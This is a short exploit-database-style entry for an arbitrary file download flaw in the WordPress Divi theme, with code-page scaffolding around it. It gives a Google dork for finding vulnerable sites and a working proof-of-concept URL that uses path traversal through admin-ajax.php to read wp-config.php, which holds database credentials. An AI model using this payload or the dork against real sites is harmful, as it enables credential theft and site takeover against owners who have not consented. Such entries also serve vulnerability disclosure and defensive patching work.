13 lines
No EOL
442 B
Text
Executable file
13 lines
No EOL
442 B
Text
Executable file
# Exploit Title: Wordpress Theme Divi Arbitrary File Download Vulnerability
|
|
# Date: 08/02/2015
|
|
# Exploit Author: pool and Fran_73
|
|
# Vendor Homepage: http://www.elegantthemes.com/gallery/divi/
|
|
# Contact : ricof81@yahoo.com ( YM )
|
|
# Tested on: Linux / Window
|
|
# Google Dork: inurl:wp-content/themes/Divi/
|
|
######################
|
|
# PoC
|
|
http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
|
|
|
|
|
|
|